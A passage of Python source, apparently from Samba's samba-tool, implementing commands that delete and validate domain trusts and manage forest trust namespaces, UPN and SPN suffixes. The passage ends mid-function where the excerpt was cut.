local_policy_access |= lsa.LSA_POLICY_TRUST_ADMIN
local_policy_access |= lsa.LSA_POLICY_CREATE_SECRET
if delete_location == "local":
remote_policy_access = None
else:
remote_policy_access = lsa.LSA_POLICY_VIEW_LOCAL_INFORMATION
remote_policy_access |= lsa.LSA_POLICY_TRUST_ADMIN
remote_policy_access |= lsa.LSA_POLICY_CREATE_SECRET
local_server = self.setup_local_server(sambaopts, localdcopts)
try:
local_lsa = self.new_local_lsa_connection()
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to connect lsa server")
try:
(local_policy, local_lsa_info) = self.get_lsa_info(local_lsa, local_policy_access)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to query LSA_POLICY_INFO_DNS")
self.outf.write("LocalDomain Netbios[%s] DNS[%s] SID[%s]\n" % (
local_lsa_info.name.string,
local_lsa_info.dns_domain.string,
local_lsa_info.sid))
local_tdo_info = None
local_tdo_handle = None
remote_tdo_info = None
remote_tdo_handle = None
lsaString = lsa.String()
try:
lsaString.string = domain
local_tdo_info = local_lsa.QueryTrustedDomainInfoByName(local_policy,
lsaString, lsa.LSA_TRUSTED_DOMAIN_INFO_INFO_EX)
except NTSTATUSError as error:
if self.check_runtime_error(error, ntstatus.NT_STATUS_OBJECT_NAME_NOT_FOUND):
raise CommandError("Failed to find trust for domain '%s'" % domain)
raise self.RemoteRuntimeError(self, error, "failed to locate remote server")
if remote_policy_access is not None:
try:
remote_server = self.setup_remote_server(credopts, domain)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "failed to locate remote server")
try:
remote_lsa = self.new_remote_lsa_connection()
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "failed to connect lsa server")
try:
(remote_policy, remote_lsa_info) = self.get_lsa_info(remote_lsa, remote_policy_access)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "failed to query LSA_POLICY_INFO_DNS")
self.outf.write("RemoteDomain Netbios[%s] DNS[%s] SID[%s]\n" % (
remote_lsa_info.name.string,
remote_lsa_info.dns_domain.string,
remote_lsa_info.sid))
if remote_lsa_info.sid != local_tdo_info.sid or \
remote_lsa_info.name.string != local_tdo_info.netbios_name.string or \
remote_lsa_info.dns_domain.string != local_tdo_info.domain_name.string:
raise CommandError("LocalTDO inconsistend: Netbios[%s] DNS[%s] SID[%s]" % (
local_tdo_info.netbios_name.string,
local_tdo_info.domain_name.string,
local_tdo_info.sid))
try:
lsaString.string = local_lsa_info.dns_domain.string
remote_tdo_info = \
remote_lsa.QueryTrustedDomainInfoByName(remote_policy,
lsaString,
lsa.LSA_TRUSTED_DOMAIN_INFO_INFO_EX)
except NTSTATUSError as error:
if not self.check_runtime_error(error, ntstatus.NT_STATUS_OBJECT_NAME_NOT_FOUND):
raise self.RemoteRuntimeError(self, error, "QueryTrustedDomainInfoByName(%s)" % (
lsaString.string))
if remote_tdo_info is not None:
if local_lsa_info.sid != remote_tdo_info.sid or \
local_lsa_info.name.string != remote_tdo_info.netbios_name.string or \
local_lsa_info.dns_domain.string != remote_tdo_info.domain_name.string:
raise CommandError("RemoteTDO inconsistend: Netbios[%s] DNS[%s] SID[%s]" % (
remote_tdo_info.netbios_name.string,
remote_tdo_info.domain_name.string,
remote_tdo_info.sid))
if local_tdo_info is not None:
try:
lsaString.string = local_tdo_info.domain_name.string
local_tdo_handle = \
local_lsa.OpenTrustedDomainByName(local_policy,
lsaString,
security.SEC_STD_DELETE)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "OpenTrustedDomainByName(%s)" % (
lsaString.string))
if remote_tdo_info is not None:
try:
lsaString.string = remote_tdo_info.domain_name.string
remote_tdo_handle = \
remote_lsa.OpenTrustedDomainByName(remote_policy,
lsaString,
security.SEC_STD_DELETE)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "OpenTrustedDomainByName(%s)" % (
lsaString.string))
if remote_tdo_handle is not None:
try:
remote_lsa.DeleteObject(remote_tdo_handle)
remote_tdo_handle = None
self.outf.write("RemoteTDO deleted.\n")
except RuntimeError as error:
self.outf.write("%s\n" % self.RemoteRuntimeError(self, error, "DeleteObject() failed"))
if local_tdo_handle is not None:
try:
local_lsa.DeleteObject(local_tdo_handle)
local_tdo_handle = None
self.outf.write("LocalTDO deleted.\n")
except RuntimeError as error:
self.outf.write("%s\n" % self.LocalRuntimeError(self, error, "DeleteObject() failed"))
return
class cmd_domain_trust_validate(DomainTrustCommand):
"""Validate a domain trust."""
synopsis = "%prog DOMAIN [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"credopts": options.CredentialsOptions,
"localdcopts": LocalDCCredentialsOptions,
}
takes_options = [
Option("--validate-location", type="choice", metavar="LOCATION",
choices=["local", "both"],
help="Where to validate the trusted domain object: 'local' or 'both'.",
dest='validate_location',
default="both"),
]
takes_args = ["domain"]
def run(self, domain, sambaopts=None, versionopts=None, credopts=None, localdcopts=None,
validate_location=None):
local_policy_access = lsa.LSA_POLICY_VIEW_LOCAL_INFORMATION
local_server = self.setup_local_server(sambaopts, localdcopts)
try:
local_lsa = self.new_local_lsa_connection()
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to connect lsa server")
try:
(local_policy, local_lsa_info) = self.get_lsa_info(local_lsa, local_policy_access)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to query LSA_POLICY_INFO_DNS")
self.outf.write("LocalDomain Netbios[%s] DNS[%s] SID[%s]\n" % (
local_lsa_info.name.string,
local_lsa_info.dns_domain.string,
local_lsa_info.sid))
try:
lsaString = lsa.String()
lsaString.string = domain
local_tdo_info = \
local_lsa.QueryTrustedDomainInfoByName(local_policy,
lsaString,
lsa.LSA_TRUSTED_DOMAIN_INFO_INFO_EX)
except NTSTATUSError as error:
if self.check_runtime_error(error, ntstatus.NT_STATUS_OBJECT_NAME_NOT_FOUND):
raise CommandError("trusted domain object does not exist for domain [%s]" % domain)
raise self.LocalRuntimeError(self, error, "QueryTrustedDomainInfoByName(INFO_EX) failed")
self.outf.write("LocalTDO Netbios[%s] DNS[%s] SID[%s]\n" % (
local_tdo_info.netbios_name.string,
local_tdo_info.domain_name.string,
local_tdo_info.sid))
try:
local_netlogon = self.new_local_netlogon_connection()
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to connect netlogon server")
try:
local_trust_verify = \
local_netlogon.netr_LogonControl2Ex(local_server,
netlogon.NETLOGON_CONTROL_TC_VERIFY,
2,
local_tdo_info.domain_name.string)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "NETLOGON_CONTROL_TC_VERIFY failed")
local_trust_status = self._uint32(local_trust_verify.pdc_connection_status[0])
local_conn_status = self._uint32(local_trust_verify.tc_connection_status[0])
if local_trust_verify.flags & netlogon.NETLOGON_VERIFY_STATUS_RETURNED:
local_validation = "LocalValidation: DC[%s] CONNECTION[%s] TRUST[%s] VERIFY_STATUS_RETURNED" % (
local_trust_verify.trusted_dc_name,
local_trust_verify.tc_connection_status[1],
local_trust_verify.pdc_connection_status[1])
else:
local_validation = "LocalValidation: DC[%s] CONNECTION[%s] TRUST[%s]" % (
local_trust_verify.trusted_dc_name,
local_trust_verify.tc_connection_status[1],
local_trust_verify.pdc_connection_status[1])
if local_trust_status != werror.WERR_SUCCESS or local_conn_status != werror.WERR_SUCCESS:
raise CommandError(local_validation)
else:
self.outf.write("OK: %s\n" % local_validation)
try:
server = local_trust_verify.trusted_dc_name.replace('\\', '')
domain_and_server = "%s\\%s" % (local_tdo_info.domain_name.string, server)
local_trust_rediscover = \
local_netlogon.netr_LogonControl2Ex(local_server,
netlogon.NETLOGON_CONTROL_REDISCOVER,
2,
domain_and_server)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "NETLOGON_CONTROL_REDISCOVER failed")
local_conn_status = self._uint32(local_trust_rediscover.tc_connection_status[0])
local_rediscover = "LocalRediscover: DC[%s] CONNECTION[%s]" % (
local_trust_rediscover.trusted_dc_name,
local_trust_rediscover.tc_connection_status[1])
if local_conn_status != werror.WERR_SUCCESS:
raise CommandError(local_rediscover)
else:
self.outf.write("OK: %s\n" % local_rediscover)
if validate_location != "local":
try:
remote_server = self.setup_remote_server(credopts, domain, require_pdc=False)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "failed to locate remote server")
try:
remote_netlogon = self.new_remote_netlogon_connection()
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "failed to connect netlogon server")
try:
remote_trust_verify = \
remote_netlogon.netr_LogonControl2Ex(remote_server,
netlogon.NETLOGON_CONTROL_TC_VERIFY,
2,
local_lsa_info.dns_domain.string)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "NETLOGON_CONTROL_TC_VERIFY failed")
remote_trust_status = self._uint32(remote_trust_verify.pdc_connection_status[0])
remote_conn_status = self._uint32(remote_trust_verify.tc_connection_status[0])
if remote_trust_verify.flags & netlogon.NETLOGON_VERIFY_STATUS_RETURNED:
remote_validation = "RemoteValidation: DC[%s] CONNECTION[%s] TRUST[%s] VERIFY_STATUS_RETURNED" % (
remote_trust_verify.trusted_dc_name,
remote_trust_verify.tc_connection_status[1],
remote_trust_verify.pdc_connection_status[1])
else:
remote_validation = "RemoteValidation: DC[%s] CONNECTION[%s] TRUST[%s]" % (
remote_trust_verify.trusted_dc_name,
remote_trust_verify.tc_connection_status[1],
remote_trust_verify.pdc_connection_status[1])
if remote_trust_status != werror.WERR_SUCCESS or remote_conn_status != werror.WERR_SUCCESS:
raise CommandError(remote_validation)
else:
self.outf.write("OK: %s\n" % remote_validation)
try:
server = remote_trust_verify.trusted_dc_name.replace('\\', '')
domain_and_server = "%s\\%s" % (local_lsa_info.dns_domain.string, server)
remote_trust_rediscover = \
remote_netlogon.netr_LogonControl2Ex(remote_server,
netlogon.NETLOGON_CONTROL_REDISCOVER,
2,
domain_and_server)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "NETLOGON_CONTROL_REDISCOVER failed")
remote_conn_status = self._uint32(remote_trust_rediscover.tc_connection_status[0])
remote_rediscover = "RemoteRediscover: DC[%s] CONNECTION[%s]" % (
remote_trust_rediscover.trusted_dc_name,
remote_trust_rediscover.tc_connection_status[1])
if remote_conn_status != werror.WERR_SUCCESS:
raise CommandError(remote_rediscover)
else:
self.outf.write("OK: %s\n" % remote_rediscover)
return
class cmd_domain_trust_namespaces(DomainTrustCommand):
"""Manage forest trust namespaces."""
synopsis = "%prog [DOMAIN] [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"localdcopts": LocalDCCredentialsOptions,
}
takes_options = [
Option("--refresh", type="choice", metavar="check|store",
choices=["check", "store", None],
help="List and maybe store refreshed forest trust information: 'check' or 'store'.",
dest='refresh',
default=None),
Option("--enable-all", action="store_true",
help="Try to update disabled entries, not allowed with --refresh=check.",
dest='enable_all',
default=False),
Option("--enable-tln", action="append", metavar='DNSDOMAIN',
help="Enable a top level name entry. Can be specified multiple times.",
dest='enable_tln',
default=[]),
Option("--disable-tln", action="append", metavar='DNSDOMAIN',
help="Disable a top level name entry. Can be specified multiple times.",
dest='disable_tln',
default=[]),
Option("--add-tln-ex", action="append", metavar='DNSDOMAIN',
help="Add a top level exclusion entry. Can be specified multiple times.",
dest='add_tln_ex',
default=[]),
Option("--delete-tln-ex", action="append", metavar='DNSDOMAIN',
help="Delete a top level exclusion entry. Can be specified multiple times.",
dest='delete_tln_ex',
default=[]),
Option("--enable-nb", action="append", metavar='NETBIOSDOMAIN',
help="Enable a netbios name in a domain entry. Can be specified multiple times.",
dest='enable_nb',
default=[]),
Option("--disable-nb", action="append", metavar='NETBIOSDOMAIN',
help="Disable a netbios name in a domain entry. Can be specified multiple times.",
dest='disable_nb',
default=[]),
Option("--enable-sid", action="append", metavar='DOMAINSID',
help="Enable a SID in a domain entry. Can be specified multiple times.",
dest='enable_sid_str',
default=[]),
Option("--disable-sid", action="append", metavar='DOMAINSID',
help="Disable a SID in a domain entry. Can be specified multiple times.",
dest='disable_sid_str',
default=[]),
Option("--add-upn-suffix", action="append", metavar='DNSDOMAIN',
help="Add a new uPNSuffixes attribute for the local forest. Can be specified multiple times.",
dest='add_upn',
default=[]),
Option("--delete-upn-suffix", action="append", metavar='DNSDOMAIN',
help="Delete an existing uPNSuffixes attribute of the local forest. Can be specified multiple times.",
dest='delete_upn',
default=[]),
Option("--add-spn-suffix", action="append", metavar='DNSDOMAIN',
help="Add a new msDS-SPNSuffixes attribute for the local forest. Can be specified multiple times.",
dest='add_spn',
default=[]),
Option("--delete-spn-suffix", action="append", metavar='DNSDOMAIN',
help="Delete an existing msDS-SPNSuffixes attribute of the local forest. Can be specified multiple times.",
dest='delete_spn',
default=[]),
]
takes_args = ["domain?"]
def run(self, domain=None, sambaopts=None, localdcopts=None, versionopts=None,
refresh=None, enable_all=False,
enable_tln=[], disable_tln=[], add_tln_ex=[], delete_tln_ex=[],
enable_sid_str=[], disable_sid_str=[], enable_nb=[], disable_nb=[],
add_upn=[], delete_upn=[], add_spn=[], delete_spn=[]):
require_update = False
if domain is None:
if refresh == "store":
raise CommandError("--refresh=%s not allowed without DOMAIN" % refresh)
if enable_all:
raise CommandError("--enable-all not allowed without DOMAIN")
if len(enable_tln) > 0:
raise CommandError("--enable-tln not allowed without DOMAIN")
if len(disable_tln) > 0:
raise CommandError("--disable-tln not allowed without DOMAIN")
if len(add_tln_ex) > 0:
raise CommandError("--add-tln-ex not allowed without DOMAIN")
if len(delete_tln_ex) > 0:
raise CommandError("--delete-tln-ex not allowed without DOMAIN")
if len(enable_nb) > 0:
raise CommandError("--enable-nb not allowed without DOMAIN")
if len(disable_nb) > 0:
raise CommandError("--disable-nb not allowed without DOMAIN")
if len(enable_sid_str) > 0:
raise CommandError("--enable-sid not allowed without DOMAIN")
if len(disable_sid_str) > 0:
raise CommandError("--disable-sid not allowed without DOMAIN")
if len(add_upn) > 0:
for n in add_upn:
if not n.startswith("*."):
continue
raise CommandError("value[%s] specified for --add-upn-suffix should not include with '*.'" % n)
require_update = True
if len(delete_upn) > 0:
for n in delete_upn:
if not n.startswith("*."):
continue
raise CommandError("value[%s] specified for --delete-upn-suffix should not include with '*.'" % n)
require_update = True
for a in add_upn:
for d in delete_upn:
if a.lower() != d.lower():
continue
raise CommandError("value[%s] specified for --add-upn-suffix and --delete-upn-suffix" % a)
if len(add_spn) > 0:
for n in add_spn:
if not n.startswith("*."):
continue
raise CommandError("value[%s] specified for --add-spn-suffix should not include with '*.'" % n)
require_update = True
if len(delete_spn) > 0:
for n in delete_spn:
if not n.startswith("*."):
continue
raise CommandError("value[%s] specified for --delete-spn-suffix should not include with '*.'" % n)
require_update = True
for a in add_spn:
for d in delete_spn:
if a.lower() != d.lower():
continue
raise CommandError("value[%s] specified for --add-spn-suffix and --delete-spn-suffix" % a)
else:
if len(add_upn) > 0:
raise CommandError("--add-upn-suffix not allowed together with DOMAIN")
if len(delete_upn) > 0:
raise CommandError("--delete-upn-suffix not allowed together with DOMAIN")
if len(add_spn) > 0:
raise CommandError("--add-spn-suffix not allowed together with DOMAIN")
if len(delete_spn) > 0:
raise CommandError("--delete-spn-suffix not allowed together with DOMAIN")
if refresh is not None:
if refresh == "store":
require_update = True
if enable_all and refresh != "store":
raise CommandError("--enable-all not allowed together with --refresh=%s" % refresh)
if len(enable_tln) > 0:
raise CommandError("--enable-tln not allowed together with --refresh")
if len(disable_tln) > 0:
raise CommandError("--disable-tln not allowed together with --refresh")
if len(add_tln_ex) > 0:
raise CommandError("--add-tln-ex not allowed together with --refresh")
if len(delete_tln_ex) > 0:
raise CommandError("--delete-tln-ex not allowed together with --refresh")
if len(enable_nb) > 0:
raise CommandError("--enable-nb not allowed together with --refresh")
if len(disable_nb) > 0:
raise CommandError("--disable-nb not allowed together with --refresh")
if len(enable_sid_str) > 0:
raise CommandError("--enable-sid not allowed together with --refresh")
if len(disable_sid_str) > 0:
raise CommandError("--disable-sid not allowed together with --refresh")
else:
if enable_all:
require_update = True
if len(enable_tln) > 0:
raise CommandError("--enable-tln not allowed together with --enable-all")
if len(enable_nb) > 0:
raise CommandError("--enable-nb not allowed together with --enable-all")
if len(enable_sid_str) > 0:
raise CommandError("--enable-sid not allowed together with --enable-all")
if len(enable_tln) > 0:
require_update = True
if len(disable_tln) > 0:
require_update = True
for e in enable_tln:
for d in disable_tln:
if e.lower() != d.lower():
continue
raise CommandError("value[%s] specified for --enable-tln and --disable-tln" % e)
if len(add_tln_ex) > 0:
for n in add_tln_ex:
if not n.startswith("*."):
continue
raise CommandError("value[%s] specified for --add-tln-ex should not include with '*.'" % n)
require_update = True
if len(delete_tln_ex) > 0:
for n in delete_tln_ex:
if not n.startswith("*."):
continue
raise CommandError("value[%s] specified for --delete-tln-ex should not include with '*.'" % n)
require_update = True
for a in add_tln_ex:
for d in delete_tln_ex:
if a.lower() != d.lower():
continue
raise CommandError("value[%s] specified for --add-tln-ex and --delete-tln-ex" % a)
if len(enable_nb) > 0:
require_update = True
if len(disable_nb) > 0:
require_update = True
for e in enable_nb:
for d in disable_nb:
if e.upper() != d.upper():
continue
raise CommandError("value[%s] specified for --enable-nb and --disable-nb" % e)
enable_sid = []
for s in enable_sid_str:
try:
sid = security.dom_sid(s)
except TypeError as error:
raise CommandError("value[%s] specified for --enable-sid is not a valid SID" % s)
enable_sid.append(sid)
disable_sid = []
for s in disable_sid_str:
try:
sid = security.dom_sid(s)
except TypeError as error:
raise CommandError("value[%s] specified for --disable-sid is not a valid SID" % s)
disable_sid.append(sid)
if len(enable_sid) > 0:
require_update = True
if len(disable_sid) > 0:
require_update = True
for e in enable_sid:
for d in disable_sid:
if e != d:
continue
raise CommandError("value[%s] specified for --enable-sid and --disable-sid" % e)
local_policy_access = lsa.LSA_POLICY_VIEW_LOCAL_INFORMATION
if require_update:
local_policy_access |= lsa.LSA_POLICY_TRUST_ADMIN
local_server = self.setup_local_server(sambaopts, localdcopts)
try:
local_lsa = self.new_local_lsa_connection()
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to connect lsa server")
try:
(local_policy, local_lsa_info) = self.get_lsa_info(local_lsa, local_policy_access)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to query LSA_POLICY_INFO_DNS")
self.outf.write("LocalDomain Netbios[%s] DNS[%s] SID[%s]\n" % (
local_lsa_info.name.string,
local_lsa_info.dns_domain.string,
local_lsa_info.sid))
if domain is None:
try:
local_netlogon = self.new_local_netlogon_connection()
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to connect netlogon server")
try:
local_netlogon_info = self.get_netlogon_dc_info(local_netlogon, local_server)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to get netlogon dc info")
if local_netlogon_info.domain_name != local_netlogon_info.forest_name:
raise CommandError("The local domain [%s] is not the forest root [%s]" % (
local_netlogon_info.domain_name,
local_netlogon_info.forest_name))
try:
# get all information about our own forest
own_forest_info = local_netlogon.netr_DsRGetForestTrustInformation(local_netlogon_info.dc_unc,
None, 0)
except RuntimeError as error:
if self.check_runtime_error(error, werror.WERR_RPC_S_PROCNUM_OUT_OF_RANGE):
raise CommandError("LOCAL_DC[%s]: netr_DsRGetForestTrustInformation() not supported." % (
self.local_server))
if self.check_runtime_error(error, werror.WERR_INVALID_FUNCTION):
raise CommandError("LOCAL_DC[%s]: netr_DsRGetForestTrustInformation() not supported." % (
self.local_server))
if self.check_runtime_error(error, werror.WERR_NERR_ACFNOTLOADED):
raise CommandError("LOCAL_DC[%s]: netr_DsRGetForestTrustInformation() not supported." % (
self.local_server))
raise self.LocalRuntimeError(self, error, "netr_DsRGetForestTrustInformation() failed")
self.outf.write("Own forest trust information...\n")
self.write_forest_trust_info(own_forest_info,
tln=local_lsa_info.dns_domain.string)
try:
local_samdb = self.new_local_ldap_connection()
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to connect to SamDB")
local_partitions_dn = "CN=Partitions,%s" % str(local_samdb.get_config_basedn())
attrs = ['uPNSuffixes', 'msDS-SPNSuffixes']
try:
msgs = local_samdb.search(base=local_partitions_dn,
scope=ldb.SCOPE_BASE,
expression="(objectClass=crossRefContainer)",
attrs=attrs)
stored_msg = msgs[0]
except ldb.LdbError as error:
raise self.LocalLdbError(self, error, "failed to search partition dn")
stored_upn_vals = []
if 'uPNSuffixes' in stored_msg:
stored_upn_vals.extend(stored_msg['uPNSuffixes'])
stored_spn_vals = []
if 'msDS-SPNSuffixes' in stored_msg:
stored_spn_vals.extend(stored_msg['msDS-SPNSuffixes'])
self.outf.write("Stored uPNSuffixes attributes[%d]:\n" % len(stored_upn_vals))
for v in stored_upn_vals:
self.outf.write("TLN: %-32s DNS[*.%s]\n" % ("", v))
self.outf.write("Stored msDS-SPNSuffixes attributes[%d]:\n" % len(stored_spn_vals))
for v in stored_spn_vals:
self.outf.write("TLN: %-32s DNS[*.%s]\n" % ("", v))
if not require_update:
return
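# Apply the requested suffix changes on top of the stored values; each add
# must be new and each delete must match an existing entry.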
replace_upn = False
update_upn_vals = []
update_upn_vals.extend(stored_upn_vals)
replace_spn = False
update_spn_vals = []
update_spn_vals.extend(stored_spn_vals)
for upn in add_upn:
for i, v in enumerate(update_upn_vals):
if str(v).lower() == upn.lower():
raise CommandError("Entry already present for "
"value[%s] specified for "
"--add-upn-suffix" % upn)
update_upn_vals.append(upn)
replace_upn = True
for upn in delete_upn:
idx = None
for i, v in enumerate(update_upn_vals):
if str(v).lower() != upn.lower():
continue
idx = i
break
if idx is None:
raise CommandError("Entry not found for value[%s] specified for --delete-upn-suffix" % upn)
update_upn_vals.pop(idx)
replace_upn = True
for spn in add_spn:
for i, v in enumerate(update_spn_vals):
if str(v).lower() == spn.lower():
raise CommandError("Entry already present for "
"value[%s] specified for "
"--add-spn-suffix" % spn)
update_spn_vals.append(spn)
replace_spn = True
for spn in delete_spn:
idx = None
for i, v in enumerate(update_spn_vals):
if str(v).lower() != spn.lower():
continue
idx = i
break
if idx is None:
raise CommandError("Entry not found for value[%s] specified for --delete-spn-suffix" % spn)
update_spn_vals.pop(idx)
replace_spn = True
self.outf.write("Update uPNSuffixes attributes[%d]:\n" % len(update_upn_vals))
for v in update_upn_vals:
self.outf.write("TLN: %-32s DNS[*.%s]\n" % ("", v))
self.outf.write("Update msDS-SPNSuffixes attributes[%d]:\n" % len(update_spn_vals))
for v in update_spn_vals:
self.outf.write("TLN: %-32s DNS[*.%s]\n" % ("", v))
update_msg = ldb.Message()
update_msg.dn = stored_msg.dn
if replace_upn:
update_msg['uPNSuffixes'] = ldb.MessageElement(update_upn_vals,
ldb.FLAG_MOD_REPLACE,
'uPNSuffixes')
if replace_spn:
update_msg['msDS-SPNSuffixes'] = ldb.MessageElement(update_spn_vals,
ldb.FLAG_MOD_REPLACE,
'msDS-SPNSuffixes')
try:
local_samdb.modify(update_msg)
except ldb.LdbError as error:
raise self.LocalLdbError(self, error, "failed to update partition dn")
try:
stored_forest_info = local_netlogon.netr_DsRGetForestTrustInformation(local_netlogon_info.dc_unc,
None, 0)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "netr_DsRGetForestTrustInformation() failed")
self.outf.write("Stored forest trust information...\n")
self.write_forest_trust_info(stored_forest_info,
tln=local_lsa_info.dns_domain.string)
return
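# A DOMAIN argument was given: the rest of the command operates on the
# forest trust information of that trusted domain object.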
try:
lsaString = lsa.String()
lsaString.string = domain
local_tdo_info = \
local_lsa.QueryTrustedDomainInfoByName(local_policy,
lsaString,
lsa.LSA_TRUSTED_DOMAIN_INFO_INFO_EX)
except NTSTATUSError as error:
if self.check_runtime_error(error, ntstatus.NT_STATUS_OBJECT_NAME_NOT_FOUND):
raise CommandError("trusted domain object does not exist for domain [%s]" % domain)
raise self.LocalRuntimeError(self, error, "QueryTrustedDomainInfoByName(INFO_EX) failed")
self.outf.write("LocalTDO Netbios[%s] DNS[%s] SID[%s]\n" % (
local_tdo_info.netbios_name.string,
local_tdo_info.domain_name.string,
local_tdo_info.sid))
if not local_tdo_info.trust_attributes & lsa.LSA_TRUST_ATTRIBUTE_FOREST_TRANSITIVE:
raise CommandError("trusted domain object for domain [%s] is not marked as FOREST_TRANSITIVE." % domain)
if refresh is not None:
try:
local_netlogon = self.new_local_netlogon_connection()
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to connect netlogon server")
try:
local_netlogon_info = self.get_netlogon_dc_info(local_netlogon, local_server)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to get netlogon dc info")
lsa_update_check = 1
if refresh == "store":
netlogon_update_tdo = netlogon.DS_GFTI_UPDATE_TDO
if enable_all:
lsa_update_check = 0
else:
netlogon_update_tdo = 0
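# lsa_update_check is passed as the final (check) argument to
# lsaRSetForestTrustInformation() below: 1 only checks for collisions, while
# --refresh=store --enable-all clears it so the refreshed entries are stored
# enabled. (Reading of the flag inferred from its usage here.)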
try:
# get all information about the remote trust
# this triggers netr_GetForestTrustInformation to the remote domain
# and lsaRSetForestTrustInformation() locally, but new top level
# names are disabled by default.
fresh_forest_info = \
local_netlogon.netr_DsRGetForestTrustInformation(local_netlogon_info.dc_unc,
local_tdo_info.domain_name.string,
netlogon_update_tdo)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "netr_DsRGetForestTrustInformation() failed")
try:
fresh_forest_collision = \
local_lsa.lsaRSetForestTrustInformation(local_policy,
local_tdo_info.domain_name,
lsa.LSA_FOREST_TRUST_DOMAIN_INFO,
fresh_forest_info,
lsa_update_check)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "lsaRSetForestTrustInformation() failed")
self.outf.write("Fresh forest trust information...\n")
self.write_forest_trust_info(fresh_forest_info,
tln=local_tdo_info.domain_name.string,
collisions=fresh_forest_collision)
if refresh == "store":
try:
lsaString = lsa.String()
lsaString.string = local_tdo_info.domain_name.string
stored_forest_info = \
local_lsa.lsaRQueryForestTrustInformation(local_policy,
lsaString,
lsa.LSA_FOREST_TRUST_DOMAIN_INFO)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "lsaRQueryForestTrustInformation() failed")
self.outf.write("Stored forest trust information...\n")
self.write_forest_trust_info(stored_forest_info,
tln=local_tdo_info.domain_name.string)
return
#
# The path taken when --refresh is not given
#
try:
lsaString = lsa.String()
lsaString.string = local_tdo_info.domain_name.string
local_forest_info = \
local_lsa.lsaRQueryForestTrustInformation(local_policy,
lsaString,
lsa.LSA_FOREST_TRUST_DOMAIN_INFO)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "lsaRQueryForestTrustInformation() failed")
self.outf.write("Local forest trust information...\n")
self.write_forest_trust_info(local_forest_info,
tln=local_tdo_info.domain_name.string)
if not require_update:
return
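# Work on a copy of the stored entries so the requested changes can be
# applied before writing them back.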
entries = []
entries.extend(local_forest_info.entries)
update_forest_info = lsa.ForestTrustInformation()
update_forest_info.count = len(entries)
update_forest_info.entries = entries
if enable_all:
for i, r in enumerate(update_forest_info.entries):
if r.type != lsa.LSA_FOREST_TRUST_TOP_LEVEL_NAME:
continue
if update_forest_info.entries[i].flags == 0:
continue
update_forest_info.entries[i].time = 0
update_forest_info.entries[i].flags &= ~lsa.LSA_TLN_DISABLED_MASK
for i, r in enumerate(update_forest_info.entries):
if r.type != lsa.LSA_FOREST_TRUST_DOMAIN_INFO:
continue
if update_forest_info.entries[i].flags == 0:
continue
update_forest_info.entries[i].time = 0
update_forest_info.entries[i].flags &= ~lsa.LSA_NB_DISABLED_MASK
update_forest_info.entries[i].flags &= ~lsa.LSA_SID_DISABLED_MASK
for tln in enable_tln:
idx = None
for i, r in enumerate(update_forest_info.entries):
if r.type != lsa.LSA_FOREST_TRUST_TOP_LEVEL_NAME:
continue
if r.forest_trust_data.string.lower() != tln.lower():
continue
idx = i
break
if idx is None:
raise CommandError("Entry not found for value[%s] specified for --enable-tln" % tln)
if not update_forest_info.entries[idx].flags & lsa.LSA_TLN_DISABLED_MASK:
raise CommandError("Entry found for value[%s] specified for --enable-tln is already enabled" % tln)
update_forest_info.entries[idx].time = 0
update_forest_info.entries[idx].flags &= ~lsa.LSA_TLN_DISABLED_MASK
for tln in disable_tln:
idx = None
for i, r in enumerate(update_forest_info.entries):
if r.type != lsa.LSA_FOREST_TRUST_TOP_LEVEL_NAME:
continue
if r.forest_trust_data.string.lower() != tln.lower():
continue
idx = i
break
if idx is None:
raise CommandError("Entry not found for value[%s] specified for --disable-tln" % tln)
if update_forest_info.entries[idx].flags & lsa.LSA_TLN_DISABLED_ADMIN:
raise CommandError("Entry found for value[%s] specified for --disable-tln is already disabled" % tln)
update_forest_info.entries[idx].time = 0
update_forest_info.entries[idx].flags &= ~lsa.LSA_TLN_DISABLED_MASK
update_forest_info.entries[idx].flags |= lsa.LSA_TLN_DISABLED_ADMIN
for tln_ex in add_tln_ex:
idx = None
for i, r in enumerate(update_forest_info.entries):
if r.type != lsa.LSA_FOREST_TRUST_TOP_LEVEL_NAME_EX:
continue
if r.forest_trust_data.string.lower() != tln_ex.lower():
continue
idx = i
break
if idx is not None:
raise CommandError("Entry already present for value[%s] specified for --add-tln-ex" % tln_ex)
tln_dot = ".%s" % tln_ex.lower()
idx = None
for i, r in enumerate(update_forest_info.entries):
if r.type != lsa.LSA_FOREST_TRUST_TOP_LEVEL_NAME:
continue
r_dot = ".%s" % r.forest_trust_data.string.lower()
if tln_dot == r_dot:
raise CommandError("TLN entry present for value[%s] specified for --add-tln-ex" % tln_ex)
if not tln_dot.endswith(r_dot):
continue
idx = i
break
if idx is None:
raise CommandError("No TLN parent present for value[%s] specified for --add-tln-ex" % tln_ex)
r = lsa.ForestTrustRecord()
r.type = lsa.LSA_FOREST_TRUST_TOP_LEVEL_NAME_EX
